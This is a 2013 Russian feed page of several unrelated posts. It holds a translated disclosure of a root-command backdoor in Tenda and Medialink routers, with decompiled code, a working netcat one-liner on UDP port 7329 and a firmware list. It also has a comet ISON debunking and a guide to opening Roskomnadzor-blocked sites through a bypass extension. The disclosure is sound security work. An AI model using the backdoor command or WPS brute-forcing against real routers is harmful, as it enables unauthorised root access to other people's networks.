...

суббота, 19 октября 2013 г.

[Перевод] По следам уязвимости D-Link: В беспроводных маршрутизаторах Tenda и Medialink обнаружен бэкдор

Чтобы вы не думали, что D-Link является единственным поставщиком, который оставляет бэкдоры в своей продукции, вот еще один — Tenda.



После извлечения последней прошивки для беспроводного маршрутизатора Tenda W302R, Крейг Хеффнер (Craig Heffner) решил заглянуть в /bin/httpd, которая оказался GoAhead веб-сервером:

image


Но в Tenda модифицированный сервер. Непосредственно перед входом в цикл приема HTTP, основной вызов InitMfgTask порождает функцию MfgThread как отдельный поток:

image


Первый MfgThread создает сокет UDP и слушает его на порту 7329:

image


Затем поток входит в цикл recvfrom и читает 128 байт из сокета. Он слушает каждый принятый UDP-пакет, имеющий длину в 14 байт.

image


Полученный UDP пакет затем обрабатывается этим кодом:

image


Пример этого же кода на С:



memset(rx_magic_string, 0, 0x80);
memset(command_byte, 0, 0x80);
memset(command_arg, 0, 0x80);

memcpy(rx_magic_string, rx_buf, 9);
command_byte[0] = rx_buf[11];
memcpy(command_arg, rx_buf+12, rx_size-12);

// If magic string doesn't match, stop processing this packet and wait for another packet
if(strcmp(rx_magic_string, "w302r_mfg") != 0) goto outer_receive_loop;

Мы видим, что сокет ожидает пакет со следующей структурой:



struct command_packet_t
{
char magic[10]; // 9 byte magic string ("w302r_mfg"), plus a NULL terminating byte
char command_byte;
char command_arg[117];
};

Если принятый пакет начинается со строки «w302r_mfg», код затем сравнивает в заданном байте команды трех ASCII символов ('1','х' и 'е'):

image


Для простоты, пример кода на С:



switch(command_byte)
{
case 'e':
strcpy(tx_buf, "w302r_mfg");
tx_size = 9;
break;
case '1':
if(strstr(command_arg, "iwpriv") != NULL)
tx_size = call_shell(command_arg, tx_buf, 0x800);
else
strcpy(tx_buf, "000000");
tx_size = strlen(tx_buf);
break;
case 'x':
tx_size = call_shell(command_arg, tx_buf, 0x800);
break;
default:
goto outer_receive_loop;
}

sendto(client_socket, tx_buf, tx_size, client_sock_addr, 16);
goto outer_receive_loop;

Следующие действия соответствуют тому, какой дальше будет байт:


'Е' — ping

'1 '- Позволяет запускать iwpriv-команды

'X' — позволяет выполнить любую команду от root


Если 'X' определяется как командный байт, остаток пакета после этого символа (так называемая command_arg в приведенном выше коде) передается в call_shell, которая выполняет команду через POPEN:

image


Более того, call_shell заполняет tx_buf буфер с выводом команды, которая, как мы видим из предыдущего кода C, отправляется обратно клиенту.


Зная функциональность MfgThread и структуру пакета, мы можем легко воспроизвести этот бэкдор с помощью Netcat:



$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329
drwxr-xr-x 2 0 0 1363 webroot
drwxr-xr-x 1 0 0 0 var
drwxr-xr-x 5 0 0 43 usr
drwxr-xr-x 1 0 0 0 tmp
drwxr-xr-x 2 0 0 3 sys
drwxr-xr-x 2 0 0 569 sbin
dr-xr-xr-x 39 0 0 0 proc
drwxr-xr-x 2 0 0 3 mnt
drwxr-xr-x 1 0 0 0 media
drwxr-xr-x 4 0 0 821 lib
lrwxrwxrwx 1 0 0 11 init -> bin/busybox
drwxr-xr-x 2 0 0 3 home
drwxr-xr-x 7 0 0 154 etc_ro
drwxr-xr-x 1 0 0 0 etc
drwxr-xr-x 1 0 0 0 dev
drwxr-xr-x 2 1000 100 574 bin

Данный пакет можно отправить только из локальной сети, при этом бекдором нельзя воспользоваться из глобальной сети. Тем не менее, эксплуатируемые беспроводные сети, в которых WPS включена по умолчанию, не защищены от брутфорса. ReaverPro относительно быстро взломал брутфорсом WPS, обеспечив доступ к беспроводной сети:

image


Этот бэкдор, скорее всего впервые реализованн в Tenda в W302R, хотя он также существует в Tenda W330R, а также в аналогичных моделях, таких как Medialink MWN-WAPR150N. Все они так же уязвимы перед строкой «w302r_mfg» в UDP-пакете.


UPDATE:

Ссылка на гитхаб: ea.github.io/blog/2013/10/18/tenda-backdoor/

Уязвимости подвержены следующие прошивки:


301r_v3.1.192_en.bin

W311r_W268R_H1_V3.3.6b_ost_staticR.bin

302r_v3.1.192_en.bin

V3.1.201d_W301R_2010_0709.bin

W368R_H3_V3.3.6h_EN_spi.bin

V3.1.201d_W302R_2010_0709.bin

3gr_H2_V3.3.0y_multi_02.bin

w368r_H1_V3.3.6l_EN.bin

U_W330R_V3.1.201d_tenda_en.bin

W368r_H1_V3.3.6b_ost_staticR.bin

3g611r_en_0607.bin.bin

U_W311R_W268R_H3_V3.3.6h_EN_spi.bin

U_3G611R_H2_V3.3.1e_MULTI_02.bin

US_W268RRA__H3_V3.3.6h_EN_SPI.bin

US_W311RRA__H3_V3.3.6h_EN_SPI.bin

w1500a_kfw_V1.0.1.22_en_svn6227.bin

U150M_V3.32.12_EN.bin

U300M_V3.32.12_EN.bin

U_W302RRA_V3.1.201d_EN.bin

US_N60BRV1_N60_V1.0.0.15_EN.bin

US_N6BRV1_N6_V2.0.0.2_EN.bin

U_W150M_EN_V3.33.13_SPI_EN.bin

U_W300M_EN_V3.33.13_SPI_EN.bin

U_W330R_V3.1.201f_en_onWISP.bin

W330R_V3.1.201d_EN.bin

W311R_H1_V3.3.5o.bin

w311r_H1_V3.3.5n_en.bin

US_N60BRV1_N60_V1.0.0.16_EN.bin

US_N80_W568Rbr_V1.0.1.8(4428)_en_TD.bin

W311r_H1_V3.3.6b.bin

U268R_H1_V3.3.6d_EN.bin

U311R_H1_V3.3.6d_EN.bin

U150M_RT_EN_V3.32.11.bin

U300M_RT_EN_V3.32.11.bin


This entry passed through the Full-Text RSS service — if this is your content and you're reading it on someone else's site, please read the FAQ at fivefilters.org/content-only/faq.php#publishers. Five Filters recommends:



Дайджест интересных материалов из мира веб-разработки и IT за последнюю неделю № 79 (13 — 19 октября 2013)


сегодня в 23:18





Веб-разработка




CSS




JavaScripts




Браузеры




Веб-инструменты




Новости




Сайты с интересным дизайном и функциональностью




Дизайн




Подборка бесплатных дизайнерских печенек







Веб-инструменты




Занимательное


Просим прощения за возможные опечатки или неработающие/дублирующиеся ссылки. Если вы заметили проблему — напишите пожалуйста в личку, мы стараемся оперативно их исправлять.


Дайджест за прошлую неделю.

Материал подготовили dersmoll и alekskorovin




Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.


This entry passed through the Full-Text RSS service — if this is your content and you're reading it on someone else's site, please read the FAQ at fivefilters.org/content-only/faq.php#publishers. Five Filters recommends:



Опасна ли комета ISON?

Сейчас в рунете искусственно поднимается волна паники по поводу предстоящего пролета кометы ISON и ее мнимой опасности для человечества. Рассказывают, что она неминуемо упадет на Землю, и что ее «сопровождают» какие-то объекты. Тут и NASA отключилось на радость тем, кто раскручивает этот миф.


Я давно ждал, что же придумают параноики, после феерического облома с концом света в 2012 году. И, наконец, они разродились. Люди издревле боялись комет, даже когда более-менее разобрались в происхождении этих небесных явлений. Сейчас глобальной паники кометы уже не вызывают. Однако ISON обеспечили громкий пиар сами ученые: «ярче Луны», «комета века», и это создало основания для попыток запугивания необразованных масс. Правда масштаб локален: всерьез опасаются кометы, кажется, только в России. Западные уфологи просто смакуют фейковые видео, с изображением «кораблей сопровождения» кометы.


Давайте разберемся, представляет ли комета C/2012 S1 (ISON) какую-либо опасность.



Когда ее только обнаружили в 2012 году, предварительные оценки ее размера и траектории позволили предположить, что она будет очень хорошо заметна на земном небосводе. Поэтому появилась надежда, что это будет Большая комета.


Однако с тех пор она значительно приблизилась, ее изучили с помощью межпланетных, орбитальных и наземных телескопов. Поэтому оценки масштабов события существенно изменились, и теперь только в результате очень удачного стечения обстоятельств мы ее вообще сможем увидеть невооруженным глазом.


Посмотрим внимательнее, что же к нам летит.


Одно из первых интереснейших наблюдений было проведено в январе 2013 года межпланетной станцией NASA Deep Impact, которая вращается в астероидном поясе между Марсом и Юпитером. Она значительно превысила предполагаемый ресурс своей работы, изучила все, до чего смогла дотянуться и уже долгое время летала без дела. Фактически съемка ISON стала для станции последним большим делом – в августе 2013 связь с ней прервалась, и в сентябре специалисты NASA заявили об окончательной потере аппарата.



Следующую важную съемку кометы провел космический телескоп Hubble.


Серия съемок проведенных в апреле и мае, с расстояния 650 млн. км позволила гораздо лучше рассмотреть комету. Удалось даже сделать небольшой таймлапс:



Когда же комета пересекла орбиту Юпитера и направилась в сторону Марса стало ясно, что эпохального зрелища нам ждать уже не приходится. Прогнозы астрономов становились все скромнее и скромнее: яркость кометы отставала от оптимистичных предположений, а активность формирования комы (атмосферы и хвоста) не оправдывала ожиданий.


Я с нетерпением ждал результатов наблюдений кометы в конце сентября и начале октября, проведенных марсианскими орбитальными станциями и марсоходами. Но в результате Curiosity даже не смог разглядеть комету на небосводе, а полуметровый телескоп спутника MRO прислал совсем уж несерьезную мелочь:


image


Тут надо понимать, что разница между съемкой Hubble и MRO в том, что первый снял комету целиком – с ее комой, диаметр которой был около 50 тыс. км, а второй – только ядро, диаметром около 2 км.


Сегодня наблюдение кометы доступно практически всем владельцам более-менее серьезных телескопов. Вот, например, снимок с телескопа диаметром 10,5 см:



Сейчас за кометой наблюдают десятки профессионалов и любителей, регулярные отчеты и свежие снимки со всего мира можно с легкостью найти, если задаться такой целью. Еще немного и ее уже можно будет заснять на обычные фотоаппараты с телеобъективами. Правда для этого потребуется ясное небо, отсутствие засветки, и прямые руки из плеч.


Пока NASA имитировало бездействие, научная команда Hubble провела новые съемки ISON 9 октября (фото вначале статьи). Это исследование позволило уточнить диаметр ядра — 2 км, и убедиться, что оно не утратило целостность


Теперь поговорим о траектории.

Хотя комета ISON пролетит к Земле ближе, чем недавняя хвостатая гостья Panstarrs, все равно, нас будет разделять значительное расстояние. Максимальное сближение ISON и Земли произойдет 26 декабря, и расстояние составит около 64,2 млн. км. Для примера – это превышает расстояние от Земли до Марса во время максимального сближения, и составляет 167 дистанций от Земли до Луны. Поэтому, как исключена вероятность падения Марса на Землю, так и не существует опасности падения ISON на нашу планету.


Проследить траекторию ISON можно в насовском сервисе Orbit Diagram или в удобном интерактивном сайте solarsystemscope.com.



Но сторонники теории «мывсеумрем» придумали отговорку на этот счет: а вдруг комета взорвется, и на нас упадут ее осколки?


Начнем с того, что, пока на ISON не всадится Брюс Уиллис с буровой установкой и атомной бомбой, вообще нет угрозы взрыва кометы. Но комета может раздробиться на несколько фрагментов. Это весьма вероятный исход тесного сближения кометы с Солнцем, и такие события наблюдались ранее неоднократно.


ISON должна пройти на расстоянии 1,1 млн. км от поверхности звезды. От гравитационного воздействия и приливных сил она может разделиться на несколько фрагментов. Подобное наблюдалось во время падения кометы D/1993 F2 (Шумейкеров-Леви) на Юпитер. Что показательно: все куски раздробившейся кометы продолжили исправное движение по прежней орбите.



Может комета развалиться и под действием внутренних процессов. Например предыдущая надежда параноиков – комета Еленина, распалась на подлете к Солнцу, а с Землей сблизилось только едва заметное облако пыли и газа.


Короткопериодическая комета Швассмана-Вахмана, распадается уже с 1995 года:



С каждым трехлетним витком этой кометы обломков становится все больше, но все они продолжают следовать прежней траекторией. Кстати, эта «хвостатая звезда» является хорошим примером того, что происходит с распавшейся, но неиспарившейся кометой: крупные обломки продолжают дробиться, и постепенно удаляться от ядра. Происходит это от гравитационных возмущений небесных тел, рядом с которыми фрагменты могут пролетать. В зависимости от массы фрагмента гравитационные поля влияют на них по-разному, поэтому постепенно хвост кометы становится шире и шире, но при этом прежняя орбита сохраняется. Скорость расширения хвоста составляет всего 45 км/ч


А распад кометы Линеар, ученым удалось поймать практически в «прямом эфире»:



Не исключено, что такое повторится и с ISON, но отличие от Швассмана-Вахмана нынешняя комета — долгопериодическая. Следующее ее возвращение ожидается только через 2 млн. лет, поэтому за один месяц ее фрагменты не успеют отклониться от прежней орбиты на 60 млн. км. То есть, если комета развалится прямо сейчас, в момент ее максимального сближения с Землей, ее фрагменты будут к нам ближе примерно на 75 тыс км, что в космических масштабах является незначительным мизером.


Да, Земля в январе сблизится с хвостом кометы ISON, но это будет хвост, который остался от кометы до ее сближения с Солнцем, т.е. крупных фрагментов там не будет. Прохождение через хвост кометы само по себе для Земли и землян не страшно. Собственно наша планета регулярно пересекает орбиты комет, через которые протянуты те самые «хвосты». В дни встречи Земли и «хвоста» наблюдаются метеорные потоки. Наверно все любовались падающими звездами в августовском небе, но не все задумывались, что наблюдают результат пересечения Землей орбиты кометы Свифта-Туттля. Будем надеяться, что нам повезет с погодой и ISON подарит нам красочное зрелище, даже если сама не появится на небосводе.


Теперь поговорим о фейках, которые выросли на средневековых страхах.

Разберем фото и видео, которые уже не первый день обсуждают на форумах уфологов.


Основой для нового мифа: «ISON сопровождают два корабля» стало явление, суть которого емко отражает поговорка: «дуракам полработы не кажут».


30 апреля 2013 NASA опубликовало замечательный цветной снимок участка небесной сферы, где наблюдалась комета ISON.



При этом все объекты получились в цвете, а комета черно-белой. Как известно, любой цветной цифровой снимок – это результат троекратной съемки через три цветных канала. Но из-за того, что комета и телескоп движутся по своим орбитам, а экспозиция занимает определенное время (до 490 секунд), невозможно свести каналы так, чтобы все объекты съемки оставались на своих местах. Снимок свели по звездам, а комету оставили без цвета. Но этого было только начало. Помимо готового опубликованного снимка, в архиве сырых изображений телескопа Hubble были размещены и те три снимка в разных цветных каналах, из которых был собран цветной. На каждом из этих кадров комета находилась в разном положении, при этом длинная выдержка во время съемки, привела к тому, что изображение ядра кометы получилось вытянутым. Изменилось и положение орбитального телескопа относительно кометы, поэтому разные экспозиции запечатлели разное положение ядра относительно намного более далекого фона.



Кто-то нашел эти снимки, объединил в один и получил «комету с сопровождением».


image


Вирус был запущен и вскоре нашлись те, кто решил сыграть на нем. Осенью на YouTube появилось два (а может и больше) ролика, которые демонстрируют якобы радарную съемку ядра кометы. Видео позиционируется как результат работы некоего китайского спутника:



Второе видео, тоже демонстрирует «сопровождение», только уточнено название «китайского радара»:



Для начала разберемся с «радаром». Tianlian I (Небесная цепь) — это серия геостационарных спутников-ретрансляторов, которые обеспечивают стабильную связь орбитальной станции «Шеньчжоу» с Землей. В этом его функция аналогична американским аппаратам TDRS или нашему «Лучу».



Видимо фальсификаторы решили приписать им радарные функции увидев развернутые тарелки.


Но даже если бы эти аппараты были радарами, и работали в режиме радиоинтерферометра со сверхдлинными базами, они все равно не смогли бы дать картинку, которая собирает просмотры на YouTube. Ошибкой фальсификаторов стала дата съемки. Зная ее можно легко определить расстояния до кометы, рассчитать угловой размер ядра и оценить возможность получить изображенную картинку. На 3 сентября 2013 года комета ISON располагалась на расстоянии примерно 450 млн. км. Размер ядра кометы составляет 2 км. Исходя из этого считаем по формуле a=arctg(d/L) ее угловой размер и получаем примерно 10 угловых микросекунд или микросекунд дуги. То есть, имея радиотелескоп с таким разрешением, мы увидели бы ядро в виде точки, а на видео детализация выше на порядки. Но остановимся на 10 микросекундах. Много это или мало?


На сегодня в астрономии самое высокое разрешение в радиодиапазоне (да и в любом другом) получено на международном проекте "Радиоастрон" с использованием российского космического телескопа «Спектр-Р» и сети наземных радиотелескопов в России, Европе и США. Максимально достигнутое им разрешение составляет 27 микросекунд дуги, т.е. в 3 раза больше чем требуемое для наблюдения ядра кометы. «Радиоастрон» — это уникальный проект, опыт которого Китай только надеется повторить в будущем. Космический аппарат «Спектр-Р» отдаляется от Земли на десятки тысяч километров и это позволяет получать данные в режиме радиоинтерферометрии со сверхдлинными базами, так, как если бы у Земли был радар диаметром с Сатурн (без кольца). Кроме «Радиоастрона» такого радара нет ни у Китая, ни у остального мира. Можно, конечно, сослаться на закрытость Китая, и его сумрачный научный гений, но будь у них такой телескоп они бы активно использовали его в своей пропагандисткой работе, как делают это с пилотируемыми полетами или зондами по исследованию Луны.


Кроме того, такого высокого разрешения как 27 микросекунд дуги получилось добиться исследуя радиоисточник, а комета таковым не является. Астероиды, пролетающие у Земли, исследуют радарами облучая их, но орбитальный аппарат не найдет столько энергии, чтобы облучить объект за 450 млн км.


Следующая деталь, которую не учитывают создатели фейков про комету — это принцип получения радарного изображения. На первом видео нам показывают комету, будто мы смотрим на нее «в лоб» (даже это не верно, т.к. сейчас она летит под углом примерно 45 градусов к оси наблюдения), но радар — это не видеокамера, мы получаем данные об отражении сигнала поэтому изображение видим в профиль:



Вот тут на съемке астероида 1998 QE2 (кстати с «сопровождением») в роли источника освещения выступает радар, а не Солнце, как могло бы показаться. И наблюдаем мы объект как раз «в профиль». Тем же принципом получают изображение когда делают УЗИ:



Второе видео «с китайского радара» имеет еще один ляп: оно демонстрирует направление хвоста кометы, и в ходе видеоролика это направление изменяется на 180 градусов. Хвост кометы направлен всегда в противоположную сторону от Солнца, поэтому такое изменение направления хвоста возможно в двух случаях: либо комета за время съемок облетела Солнце, либо съемка велась с космического аппарата, который облетел комету. Разумеется ни того, ни другого не происходило, поэтому, даже если бы и нашелся радар, способный дать изображение такого качества, показал бы он нам совсем другое.


Вот тут, для примера реальная съемка пролета мимо кометы Темпеля 1 аппарата NASA Stardust



Вопреки пессимистичным ожиданиям многих астрономов, я все же надеюсь, что комета не развалится у Солнца, не испарится до сближения с Землей, и все насладятся прекрасным ночным зрелищем. Также надеюсь, что это зрелище, заставит задуматься тех, кто сейчас верит глупым угрозам об опасности исходящей от ISON.


This entry passed through the Full-Text RSS service — if this is your content and you're reading it on someone else's site, please read the FAQ at fivefilters.org/content-only/faq.php#publishers. Five Filters recommends:



Лёгкий способ найти запрещённые сайты и ознакомиться с порнографическим материалом не используя Google

Привет, хабрахабр! Возможно эта информация является для ВАС очевидной, но для других может оказаться неочевидной. *Пост написан в поддержку пользователя ilyamodder, который никак не может дописать статью*

*Картинка для привлечения внимания, которая не является порнографической*

image

Что нам понадобится:

Если вы хотите узнать как ознакомиться с порнографическим материалом, не заглядывая в Google, добро пожаловать под хабракат!


1. Первым пунктом нужно зайти на этот сайт, затем скопировать все 14 страниц в Notepad++, это не так долго как кажется.

Далее в Notepad++ нажать CTRL+F, выбрать вкладку «Заменить», в окне указываем режим поиска по регулярному выражению, далее заменить

^.*ТУТТЕКСТДЛЯЗАМЕНЫ.*$ на --MARKERTOREMOVE--

Где ТУТТЕКСТДЛЯЗАМЕНЫ вводите по очереди «smes», «kurit», «rasta» и всякие другие слова, которые приходят на ум когда вы думаете о курительных смесях (правда, можете просто ввести «ФСКН» и «Роспотребнадзор», но это слишком лёгкий вариант).

Далее переключаем на поиск на «расширенный (\n...)» и меняем

--MARKERTOREMOVE--\r\n на пустую строку.

Для лёгкости, опционально, добавляем к каждому сайту http:// и удаляете маркером даты перед .

У вас должно получиться примерно так — image

2. Далее устанавливаем Chrome, если он у вас не установлен и дополнение из шапки.


3. Далее переходим по сайтам двойным кликом, если вы добавили http://(если нет, то извольте-с копировать в адресную строку) и переходим по всем сайтам подряд, открывая для себя новые просторы интернета, а если сайт заблокирован, то нам поможет волшебная кнопочка с дверью в правом верхнем углу на панели дополнений слева от настроек.

image

Вы великолепны! Теперь вы можете лично ознакомиться с порнографическим материалом, с которым ознакомились работники Роскомнадзора!


This entry passed through the Full-Text RSS service — if this is your content and you're reading it on someone else's site, please read the FAQ at fivefilters.org/content-only/faq.php#publishers. Five Filters recommends: